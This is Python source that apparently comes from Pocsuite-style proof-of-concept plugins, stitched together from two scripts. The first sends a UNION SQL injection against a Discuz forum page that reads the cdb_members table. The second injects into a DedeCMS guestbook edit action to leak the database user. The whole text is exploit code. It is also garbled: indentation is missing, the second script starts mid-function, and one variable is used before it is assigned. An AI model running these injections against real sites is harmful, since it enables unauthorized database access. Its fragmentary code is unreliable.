# the sample sites for examine
samples = ['']
def _verify(self):
result = {}
target_url = "/forummission.php?index=show&id=24 and+1=2+union+select+1,2,concat(0x7162787671,0x50664e68584e4c584352,0x716a717171),4,5,6,7,8,9,10,11 from cdb_members--"
response = req.get(self.url + target_url,
headers=self.headers,
timeout=10)
content = response.text
match = re.search('qbxvqPfNhXNLXCRqjqqq', content)
#拼接一个特殊字符串,验证concat函数是否成功执行
if match:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + target_url
return self.parse_attack(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
register(TestPOC)
msgid = line.get('href')[30:]
break
if msgid == None:
print("No msgid find,don't f**k this vulu")
payload = self.url + "/plus/guestbook.php?action=admin&job=editok&id={0}&msg=',msg=user(),email='".format(
msgid)
req.get(target)
target = self.url + "/plus/guestbook.php"
response = req.get(target)
content = response.content
for line in soup.findAll('td', attrs={'class': 'msgtd'}):
if line.text.find('@localhost') >= 0:
result = {'VerifyInfo': {}}
result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)
def _attack(self):
return self._verify()
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("Internet Nothing returned")
return output
register(Fuckdede)